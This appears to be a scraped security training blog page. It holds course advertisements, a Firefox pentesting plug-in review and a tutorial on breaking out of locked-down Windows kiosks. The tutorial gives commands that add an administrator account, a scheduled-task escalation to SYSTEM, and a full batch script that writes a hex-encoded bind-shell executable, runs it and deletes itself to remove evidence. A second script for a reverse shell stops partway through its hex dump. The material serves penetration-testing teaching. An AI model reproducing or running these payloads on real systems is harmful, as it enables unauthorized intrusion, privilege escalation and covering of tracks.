Pentester Candidate Program – June 2018

Pentester Candidate Program June 2018

On the 4th  of June 2018, InfoSec Addicts will launch the Pentester Candidate Program. This program is designed to satisfy the basic requirements of a penetration tester. The program will cover the most common technical and soft skill requirements. Top candidates will later receive job interviews for a remote penetrating testing job. This is through partnership with several penetration testing firms

Top candidates may receive interview opportunities for a cleared penetration testing position. This is more so for those with a US Security Clearance and who live in either the DC, Maryland or Virginia areas.

This is the real chance more so for those who REALLY want to become pentesters. It is the perfect combination of hands-on training, mentorship, and a real job opportunity.

Pentester opportunity just ahead

What is covered in the pentester program?

This program is hard, though rewarding. It will cover the following subject areas:

  • Command-Line Kung Fu
    • Linux Command-Line Fundamentals
    • Windows Command-Line Fundamentals
  • Network & Web App Penetration Testing
    • Scoping a penetration test
    • Performing a Penetration Test
    • Reporting penetration test findings
  • Ultimate Hacklab
    • Developing a solid attack process for lab environments
    • Scripting for challenge lab exams
    • Exploit development
    • Privilege escalation

 

  • Preparing for a job as a Penetration Tester
    • Resume assistance
    • Assistance with building a portfolio based on this program
    • Mock interview
    • Interviews with up to 10 Penetration Testing firms for top candidates
    • Interviews with up to 5 DoD contractors for top cleared candidates

Pentester tools.

What is the actual class schedule?

June classes

https://infosecaddicts.com/network-pentesting-night-school/
    + 11th and 13th of June 2018 from 7pm to 9pm ($200 if purchased separately)

https://infosecaddicts.com/linux-infosec-professionals-comptia/
    + 12th and 14th of June 2018 from 7pm to 9pm ($200 if purchased separately)

https://infosecaddicts.com/burp-suite-workshop/
    + 18th and 20th of June 2018 from 7pm to 9pm ($200 if purchased separately)

https://infosecaddicts.com/ultimate-hacklab-oscp-lpt-ecppt/
    + 25th and 27th of June 2018 from 7pm to 9pm ($200 if purchased separately)

 

How is the pentester program delivered?

Candidates will receive a set of tasks each Monday. They are to complete the tasks by Sunday at midnight EST. The tasks include:

  • Reading
  • Watching videos
  • Lab exercises to perform

On Thursdays from 7-8pm EST, a career development class (focused resume development, portfolio development, mock interviews, and discussions with potential employers).

On Saturdays from 4-6pm EST, a live online training session/QA period will be held.

 

What are the prerequisites for the pentester program?

This program is more about desire. More so, it is about work ethic and ability to work in a team environment. Although Technical ability is important, it is not the most required attribute. That being said, candidates should have:

  • Familiarity with both Windows, Linux, and VMWare
  • Familiarity with basic programming concepts
  • Ability to commit 8-12 hours per week to the program

What do you receive?

  • Access to the training program
  • Weekly group mentoring sessions with Joe McCray
  • Monthly chances to speak with hiring managers and team leads. These are managers from security consulting firms. This will happen for each month of the program
  • Log book of all of your labs. This is a technical walk-through document demonstrating your proficiency to companies you interview with
  • A letter of reference from Joe McCray
  • Top candidates are guaranteed interviews with consulting firms and DoD contracting companies.

Candidates will have a chance to take ANY and AS MANY classes that they want from InfoSec Addicts. This will come as part of this program. Most notably, as many as 20 classes are held per month.

This program will run for 1 month only. It will run for the entire month of June 2018. Interviews for top candidates will occur later in the month of June 2018.

Please fill out the form below to sign up for this program.

$200.00Select options

 

 

pentester

PowerShell For InfoSec Professionals

PowerShell For InfoSec Professionals June2018

The simple fact is if you are going to be attacking or defending modern environments with newer operating systems (Windows 10, Server 2016) – you need Powershell!

There is no getting around it, and the sooner you drink the Powershell Koolaid the better InfoSec Professional you will be.

PowerShell

What will we be doing you ask – check this out:

 

Fundamentals:

  • Simple programming fundamentals
  • Cmdlets
  • Variables
  • WMI Objects

 

Security tasks with Powershell:

  • PowerShell Tool Development
  • PCAP Parsing and Sniffing
  • Malware Analysis

 

Pentesting tasks:

  • Ping Sweeping
  • Port Scanning
  • Enumerating Hosts/Networks
  • Download & Execute
  • Parsing Nmap scans
  • Parsing Nessus scan

 

 

Tool development:

  • Programming logic for security tasks
  • Tool structure
  • …..and of course, integrating with Metasploit, and other security tools

PowerShell

Students will receive

  • 20 hours of CPEs
  • Courseware slides
  • Lab Manual

Class Videos

Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time or even a whole day.

 

 

 

Support

Each student will receive access to an InfoSec Addicts Group for the class. Groups are where students can ask questions outside of the regular class hours, work with other students on lab exercises, homework, and challenges.

A class mentor is assigned to the InfoSec Addicts Group to answer questions (allow one day for responses).

Similarly, a Customer Relationship Manager is assigned to the class to manage questions and support issues.

 

Class Schedule

18th and 20th of June 2018 from 7pm to 9pm EST

Fill out this form below to sign up for the class.

$200.00Select options

 

Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:

https://infosecaddicts.com/unlimited-classes/

 

NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

FIREFOX PLUG-INS REVIEW

FIREFOX PLUG-INS EVERY SECURITY PERSONNEL NEEDS TO KNOW 

Plug-ins, additional features in a browser, enhance the user experience. Firefox is one browser that supports a variety of plug-ins. These could include video scripts, animations, and other elements. Browsers alone do not typically support these.

Understanding how plug-ins work and interact with browsers is important. This is because most malicious attacks use plug-ins as a cyber-trespassing and theft tool. Moreover, we will secure our systems properly by understanding how plugins work.

Plug-ins have a multitude of purpose. These are used to ensure safe browsing, information grabbing, entertainment purposes, among other uses. Below are useful plug-ins one can use to gather information and carry out penetration testing.

FoxyProxy Standard

This add-on is a proxy management. It improves the browser’s proxy capabilities as well as providing analysis of URL patterns. It also switches the network connection transversely among different proxy servers. One sees an animated icon on the browser when a proxy is in use.

FoxyProxy Standard has a history tab that logs the servers used. It is possible to set the plug-in for use when necessary based on the URL’s nature. This, as a result, makes the add-on more efficient than other proxy management plug-ins.

Firefox plug-ins

Firebug

This is a Firefox web development tool embedded into the browser function. It enables the editing of HTML, JavaScript or CSS directly from the live page. The changes thereafter directly seen after saving.

This plugin helps in pinpointing web application and web page vulnerabilities. It opens a window to launch a penetration attack and can collect a user’s data. It also enables inspection of HTML elements in the page.

The CSS tab functions to check and edit the style of the page. It is a convenient way to edit the look of the page and consequently view the changes immediately. Copying of Codes is further possible for further development outside the browser. It also enables scaling and margin setup to align text and images. Additionally, it can monitor network activity. If a page is loading slowly, you can check what causes the lag from this plug-in. Firebug also has a powerful JavaScript debugger that identifies errors and measures performance of a script.

Furthermore, Firebug monitors network activity. If a page is loading slowly, you can check what causes the lag from this plug-in. Firebug has a powerful JavaScript debugger that identifies errors and measures performance of a script.

The DOM tab found in the Firebug panel helps identify code tags and edit them. This plugin also allows the easy management of cookies. All accepted cookies are reviewed as they are listed according to value.

Firefox plug-ins

Firefox plug-ins

Live HTTP Headers

Live HTTP headers are effective penetration tools used for troubleshooting, tuning and analyzing a website. This plug-in contains data such as language, caching, authorization, and character set. Normally, these data are invisible. This plugin, however, enables access to this information.

To obtain header information, right-click on the page and select “View Page Info.” Next, click the header tab on the new pop up window to view page information. Press ‘”Ctrl+Shift+A” to replay the header.

Firefox plug-ins

This plug-in is considered as a sniffer application. That is because it can view HTTP header exchanging. You can see what is happening and analyze it, and stop packet capture. To change header or URL values, you only need to highlight, edit and replay a packet. Finally, this works on both Windows and Linux.

Hackbar

Hackbar is another penetration testing tool. It appears as an extension of the address bar. Hackbar is capable of performing POST data manipulation, encryption, and encoding. This helps test XSS holes, web security, and SQL injections. Moreover, one can work on Hash algorithms, Base64 Decoding, and other data types with Hackbar.

Firesheep

Firesheep gives you the capability to attack HTTP sessions of other users accessing the same network. This plugin shows all accounts found in the network. This uses the cookie unique to a logged in account. This a result of websites protecting initial log-ins but leaving the rest of the log-ins unprotected.

These cookies are readily available for use by attackers in any open network. Firesheep captures users visiting an unsecured page. Double clicking a seized item, logs you in as that user.

Tamper Data

Tamper Data is used to edit and view HTTP requests. This add-on records ongoing requests for display on a particular website. The window shows details such as time, total duration, size and other information. Most noteworthy is that the data is copied to an external file for future reference.

Firefox plug-ins

CryptoFox

CryptoFox is an encryption-decryption plug-in. It appears as an extension of the address bar. Moreover, it has two fields. The first one corresponds to the text that needs encryption. The next field is a selection of the desired encryption method.

CryptoFox performs over 40 techniques. Furthermore, it has a dictionary attack reference for MD5 passwords. To test this plug-in, here is an AES128-bit encryption. Let’s use the AES 128-bit decrypt method for this.

Firefox plug-ins

Type “helloworld!” in the text field. Next, select AES 128-bit encryption and later on press the decode button. Thereafter, enter the “passwd” when asked to enter a password. This password will also be utilized for the decryption later. Especially relevant is the that we will use this password for decryption later.

Firefox plug-ins

After entering your password, Click OK. Afterward, this encrypts the text which is later displayed in the first field. For cross checking purposes, select the AES128-bit Decrypt and use the same password.

Firefox plug-ins

Anonymox

Anonymox is a useful plug-in that enables anonymous browsing in Firefox. This plugin creates a virtual identity. That is so because it protects you, giving access to commonly banned sites on your network. It also helps one in changing their IP address.

In addition, one can tweak Anonymox’s customizable settings per every website. Bypassing GeoIP blocks is also possible through this add-on. This is possible as it changes your origin location. This, as a result, gives you access to banned sites in your country.

The Anonymox acts as a middle ground. The request is sent to the plug-in and later, the plug-in itself replies to the web host. It enables you to select proxy identities.

Firefox plug-ins

SQL Inject Me<

This penetration testing plug-in identifies vulnerabilities in SQL injection. It looks for database errors and loopholes. This, in turn, helps to carry out an attack through sending escape strings in the database. A completed test result shows errors and the options.

Firefox plug-ins

Certificate Patrol

Certificate Patrol helps pinpoint man-in-the-middle attacks. This is done by checking SSL certificates. It shows whether anything within the certificate is modified during an exchange. This add-on uses pop-ups to inform you SSL details and lets you choose to save or not. If saved, the plug-in can cross-check for disparities.

To verify a certificate, the plug-in shows old and new versions of the SSL. You must be cautious in finding and comparing for errors. Click the Reject button should you find anything suspicious.

Firefox plug-ins

FoxySpider

Web crawlers are useful. FoxySpider in Firefox is one such add-on that organizes a website. It displays and arranges videos, music, images, etc. according to file types. It is useful in gathering information about a website.

An icon on the left side of the address bar indicates that FoxySpider is installed. There are three settings for this tool. Left clicking organizes the files, while right-clicking opens a search configuration window. Middle clicking on the icon, on the other hand, pops up a window to set requirements such as keywords or specified URLs.

Firefox plug-insFirefox plug-ins

Firefox plug-ins

Firefox plug-ins

Firefox has a 35% user rating. With plugins such as these, security engineers can find it convenience in performing their tasks. Testing and gathering information is made easier with these add-ons. We encourage you to download these plug-ins to try it out yourself.

Source: http://resources.infosecinstitute.com/firefox-plug-ins-that-a-security-engineer-need-to-know/

Elsewhere, Click here to have a look at another cool post about Dridex malware.

Python For InfoSec Professionals

Python For InfoSec Professionals Night Class

This class aims at making students comfortable with using Python to perform simple IT Security tasks. Going beyond using other peoples’ tools in this field is the hardest step on the ladder to proficiency. This class will take you over that difficult step, enabling you to modify popular security tools or write your own. Most importantly, it is all taught in a simple manner that won’t put you to sleep like most programming courses.

 

Class Outline

Programming Concepts, Parsing Files, Logs, and PCAPs

  • Python Basics
  • Text File Parsing
  • CSV File Parsing
  • Log Parsing

python

 

  • PCAP Parsing
  • Port-Scanning
  • Bind/Reverse Shells
  • Scapy

 

  • SQL Injection
  • XSS
  • RFI/LFI

 

  • Memory Analysis
  • Identifying/Classifying/Analyzing Malware
  • Exploit Development with Python
  • Debugger automation

Please register to attend the class:

 

python

Students will receive

  • 30 hours of CPEs
  • Courseware slides
  • Lab Manual

Class Videos

Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time or even a whole day.

Support

Each student will receive access to an InfoSec Addicts Group (infosecaddicts.com) for the class. Groups are where students can ask questions outside of the regular class hours, work with other students on lab exercises, homework, and challenges.

A class mentor is assigned to the InfoSec Addicts Group to answer questions (allow one day for responses).

Similarly, a Customer Relationship Manager is assigned to the class to manage questions and support issues.

Class Schedule

28th and 30th of May 2018 from 7pm to 9pm EST

 

Class Cost: $200

Fill out this form to sign up for the class.

$200.00Select options

 

 

Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:

https://infosecaddicts.com/unlimited-classes/

 

NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

CYBERWAR: Advanced Offensive Cyber Operations

CYBERWAR: Advanced Offensive Cyber Operations

I’m writing this post to let you know that the new night class version of CyberWar: Advanced Offensive Cyber Operations course which is ready to go. I’d l love if you’d signup for this class – This is one superb class! Offensive Cyber Operations Here is the CyberWar: Advanced Offensive Cyber Operations course outline.

Advanced Scanning & Enumeration

Attack Methodology

Identifying vulnerabilities

Using NMap NSE scripts

Writing your own NMap NSE scripts

Advanced Metasploit

Auxiliary modules

Post modules

Writing your own Auxiliary modules

Writing your own Post modules

Attacking Web Apps & Databases

Attacking Web Apps (ASPX, and PHP)

Web App – Tricky SQL Injections

Dealing with Web Application Firewalls

Attacking Big Data Solutions

 

Final Mission:

Students will attack the servers in the lab environment. These servers are much harder to penetrate than standard servers in the typical production environment. Similarly, these vulnerabilities are difficult to exploit (on purpose) – this particular class is designed with several complex targets to help students prepare for the OSCP exam network challenge certification.

Lab Network Access

Strategic Security now has a penetration tester’s target practice lab environment. Targets in the lab network will change on the 1st of every month. Students have the option to purchase 1 or 3 months access to the lab environment. Offensive Cyber Operations Students will receive

  • 30 hours of CPEs
  • Several virtual machines
  • Courseware slides
  • Lab Manual
  • Lab access

Class Videos

Students will receive all class recordings via their emails. This will help them keep up with the class even if they have to miss time or even a whole day.

Support

Each student will have access to an InfoSec Addicts Group (infosecaddicts.com) for the class. Groups are where students can ask questions outside of the regular class hours. Additionally, this is where they can work with other students on lab exercises, homework, and challenges. A Strategic Security class mentor will be assigned to the InfoSec Addicts Group to answer questions (allow one day for responses). Likewise, a Customer Relationship Manager will get assigned to the class to manage questions and support issues.

Class Schedule

4th and 6th of June 2018 from 7pm to 9pm EST

 

Class Cost

The class cost is $200 with 1 month of lab access.

 

Register to attend the class:

Fill out this form to sign up for the class.

$200.00Select options

Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:

https://infosecaddicts.com/unlimited-classes/

 

NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

BYPASSING RESTRICTED ENVIRONMENTS

I just got an email from an old student that is doing a pentest and he asked me about pentesting restricted environments like locked down desktops, Citrix, kiosks, etc. I figured I’d put together a blog post on the subject. Later, if people like it, I will do some more blog posts that go deeper into the subject probably covering things like bypassing Software Restriction Policy (SRP) and breaking out of sandboxes. So here goes…..

Windows Environments

There are a lot of different ways to lock down a Windows environment. Certainly, the most widely used method is through Group Policy. Group Policy is a set of rules that govern the environment (restriction of access to certain programs, tools, folders, etc.).

Opening Windows folders with Internet Explorer

Chances are that most vital programs and functions, which would allow any noteworthy access, are blocked in a corporate or public environment.  Luckily though, 99% of the time, Internet Explorer is not blocked as it is a vital part of the business functionality. For this reason, we will use the Shell handler to access Windows folders through Internet Explorer.  Basically, if you enter a particular string into the URL bar of IE, an instance of explorer.exe will spawn and browse to the specified folder. Most of all, note that these will work with Internet Explorer ONLY.

Here are some examples of different commands:

shell:profile: This command opens up the User Profile for whatever account you get logged in as.

 

BYPASSING RESTRICTED ENVIRONMENTS

Bypassing

 

shell:programfiles: this command opens up the Program Files folder.

 

BYPASSING RESTRICTED ENVIRONMENTS

Bypassing

 

shell:system:  Here, we can open up the system32 folder.

 

BYPASSING RESTRICTED ENVIRONMENTS

Bypassing

 

shell:controlpanelfolder:  This command opens up the Control Panel.

 

BYPASSING RESTRICTED ENVIRONMENTS

Bypassing

 

shell:windows: Finally, we can open up the WINDOWS folder with this command.

 

BYPASSING RESTRICTED ENVIRONMENTS

Bypassing

 

Additionally, one can navigate to the Control Panel folder by entering the following command into the URL bar: shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}

 

BYPASSING RESTRICTED ENVIRONMENTS

Bypassing

Accessing cmd.exe through the Microsoft Help and Support Center (this works on win xp and win 2003 not on windows 7)

If access to cmd.exe through ordinary means is disabled, there is another way of access it. This technique utilizes the Help and Support Center to spawn a command prompt for user interaction.  To do this, just enter the following command into the URL bar in Internet Explorer:

HCP:// Help And Support Center

BYPASSING RESTRICTED ENVIRONMENTSBypassing

After entering the command, you can see that the Help and Support Center window has spawned.  Next, type “Command Prompt” into the search bar and hit enter.  On the left-hand side of the window under Suggested Topics, you will see a result called “Using Command Prompt,” click it.

 

 

BYPASSING RESTRICTED ENVIRONMENTS

Bypassing

 

Finally, click on the highlighted link named “Command Prompt” and voila, you have a shell!

 

BYPASSING RESTRICTED ENVIRONMENTS

Bypassing

 

Show me some love and tweet this
Tweet: Check out a cool blog post from @j0emccray on Bypassing Restricted Environments.Bypassing Restricted Environments

Defeating Blacklists

Similarly, Windows Explorer becomes completely blacklisted in some cases. You may not be able to get to it from the Start Menu. In the same way, we can use Internet Explorer to spawn an explorer.exe window and have it navigate to a particular file location. Here is an example of this relatively simple technique:

Typing C:\windows into the URL bar accesses the WINDOWS folder on the C: drive

BYPASSING RESTRICTED ENVIRONMENTSBypassing

 

Elsewhere, C:\windows may become blocked in several situations. Nevertheless, you can substitute any of these commands.  Just enter any of these into the URL bar to achieve the same result:

File:/C:/windows

File:/C:\windows\

File:/C:\windows/

File:/C:/windows

File://C:/windows

File://C:\windows/

File://C:\windows

C:/windows

 C:/windows/

C:/windows\

%WINDIR%

In addition, you can use the same technique to enter other commands into the URL bar. The commands jump to different file locations:

Command                              Jumps to

————-                               ———–

%TMP%                                 C:\Documents and Settings\Administrator\Local Settings\Temp

%TEMP%                              C:\Documents and Settings\Administrator\Local Settings\Temp

%SYSTEMDRIVE%              C:\

%SYSTEMROOT%                 C:\WINDOWS

%APPDATA%                    C:\Documents and Settings\Administrator\Application                                                                                                                                   Data

%HOMEDRIVE%                 C:\

%HOMESHARE%                Fully qualified path to your server based profile

Create a new user and add them to the Administrators Group

This is another simple task which consists of 2 commands.  The syntax of creating a new user is net user *whatever username you want* *whatever password* /add.  Elsewhere, the syntax of then adding a user to a certain group is net user localgroup *whatever group you want to add the user to* *the user you wish to add* /add.  At this point, we will create a user called secure and have their password as ninja. Later, we will add the user to the Administrators group:

BYPASSING RESTRICTED ENVIRONMENTSBypassing

 

Simple privilege escalation (doesn’t work in Win 7 and above)

This time, we are going from a standard Administrator account up to a system level account in a few simple tricks. first of all, on a standard user account, open up a command prompt and type “at.”  Subsequently, If the command errors out, then this escalation technique will not work. However, if it tells you “There are no entries in the list,” then, by all means, this method will work for you:

 

BYPASSING RESTRICTED ENVIRONMENTSBypassing

 

Following the fact that we know this will work, then, we need to schedule a job. Therefore, we are going to schedule an interactive command shell to spawn:

at 20:10 /interactive “cmd.exe”

or

SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10

 

BYPASSING RESTRICTED ENVIRONMENTSBypassing
After spawning the shell, it is especially relevant noting that at the title bar, that it is called svchost.exe and not cmd.exe. That is because it was generated by the task scheduler service which runs under the Local System account:

BYPASSING RESTRICTED ENVIRONMENTSBypassing

 

since we have a command shell running with system privileges, let’s shed this user environment. Next, Ctrl+Alt+Delete to the task manager. Under the processes tab, find explorer.exe and then kill the process:

BYPASSING RESTRICTED ENVIRONMENTSBypassing

 

As a result, you will notice that the desktop has disappeared.  Next, go back to the system command shell and type in “explorer.exe.”  This will consequently spawn a new desktop environment, which will be a system level environment. This is because it was spawned from a system level command shell:

BYPASSING RESTRICTED ENVIRONMENTSBypassing

 

Creating a program that binds a shell to a port using a batch file

At this point, we will use a batch file to create an executable which in turn binds a command shell to a specified port.  This is nice because it is relatively quick and, furthermore, running the batch file is all you have to do; the rest is automatic. Meanwhile, let us have a look at the code before we get started:

echo off && echo n 1.dll >123.hex && echo e 0100 >>123.hex

echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 67 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00  >>123.hex

echo e 0180 >>123.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 63 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >>123.hex

echo e 0200 >>123.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 77 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13  >>123.hex

echo e 0280 >>123.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00  >>123.hex

echo e 0300 >>123.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 38 42 00 00 45 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c fa 31 40 03 6a 01 e8 fc 86 02 f9 f5 30 ba 18 fc fb bf 14 b2 c7 1f 6a 91 02 06 bd 3c 0c 02 e8 b0 23 a3 60 f6 59 66 c7 05 58 ce 4f 02 15 3a 19 e8 d8 5d 50 d9 aa 86 3d 66 a3 5a 31 c8 3c 5c a0 01 14 6a 10 68 29 14 ff 35 36 14 e8 82 12 29 05 0d 94 81 5e d0 0f ca  >>123.hex

echo e 0380 >>123.hex && echo 60 5c c5 a1 1e 05 88 3c 30 be c2 2a 44 51 45 04 ea 2d 14 fe 28 9f 42 68 48 93 a9 45 31 46 fb 28 e1 08 a5 8b 0b 85 46 14 e8 26 5f 07 c3 cc ff 25 20 1a 81 bb 2a 14 06 43 0c 21 1c 90 18 c8 10 64 04 4e cc 20 55 8b ec 81 c4 3f 7c fe f1 0c 56 57 e8 3a c7 89 03 45 fc 33 c9 8b 75 a9 ac 3c c0 74 07 e8 22 f2 f7 03 41 eb f4 51 d1 e9 90 e1 58 3b 01 c1 74 0b 5f 5e b8 03 10 c9 c2 08 e1 86 49 8d  >>123.hex

echo e 0400 >>123.hex && echo bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 48 f4 9d 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee e7 44 bb 1f 16 a9 ce 11  >>123.hex

echo e 0480 >>123.hex && echo 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 a8 92 52 e1 06 00 00 30 40 00 63 30 6d 64 00 81 3f 40 00 0c 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 61 71 63 1b 65 70 74 10 e1 69 73 db ca 6e 01 57 53 41 cb f9 61 72 f0 75 70 cf 18 68 23 6f 6e 73 1d 0e 62 69 94 64 19  >>123.hex

echo e 0500 >>123.hex && echo 9f c3 63 6b 65 74 bf 06 ff 03 e1 b1 91 1a 72 6e cd 6c 58 4a 47 c3 36 43 6f 6d 8b 61 37 5a 4c 62 cc 4c 80 fc 72 ed f7 3b a8 50 6f 6c ce 73 3b 21 00 00 00 00 00 00 81 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 ec be ff ff 00 00 00 02 00 00 00 0c 40 00 00  >>123.hex

echo r cx >>123.hex && echo 0477 >>123.hex && echo w >>123.hex && echo q >>123.hex && debug<123.hex && copy 1.dll bind.exe

rem *********CHANGE PORT NUMBER HERE******

bind.exe 8080

IF EXIST bind.exe GOTO kill

del %0

:kill

Especially relevant, much of what’s happening here is that a hex file and DLL are getting created. These two files are the building blocks that form bind.exe. Once created, bind.exe is being executed and begins listening on a port (in this case port 8080. However, you can and should change it to whatever port is necessary for the situation). After the shell has been bound, the batch file deletes itself and any traces of evidence.

Okay, now that we know the batch file worked, and we can see the bind.exe is running and that it is indeed listening, next, let’s hop onto our evil Linux machine and see if we can get access. We can simply netcat to the target machine (here using 192.168.3.177 as its IP address) and…

BYPASSING RESTRICTED ENVIRONMENTSBypassing

 

Further, let’s check out active connections with a netstat /ano command:

BYPASSING RESTRICTED ENVIRONMENTSBypassing

 

Finally there she is, waiting on port 8080.  And just to be sure, let’s do a task list:

BYPASSING RESTRICTED ENVIRONMENTSBypassing

 

Okay, now that we know the batch file worked, and we can see the bind.exe is running and that it is indeed listening, next, let’s hop onto our evil Linux machine and see if we can get access. We can simply netcat to the target machine (here using 192.168.3.177 as its IP address) and…

BYPASSING RESTRICTED ENVIRONMENTSBypassing
Success! We have a shell. Now, all that got done here was sending a message to all users logged on to the machine. However, I’ll let your imagination run wild with the possibilities of having Administrator access… you evil hacker, you.

Sending a reverse shell using a batch file

At this point, we are essentially going to do the same thing we did in the last exercise. On the contrary, instead of using the attacker machine to go and connect to the target machine, we will have the target machine send a shell to the attacker machine instead.

Meanwhile, let’s take a look at the code:

echo off && echo n 2.dll >1234.hex

echo e 0100 >>1234.hex && echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 df 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00  >>1234.hex

echo e 0180 >>1234.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 db 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >>1234.hex

echo e 0200 >>1234.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 ef 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13  >>1234.hex

echo e 0280 >>1234.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00  >>1234.hex

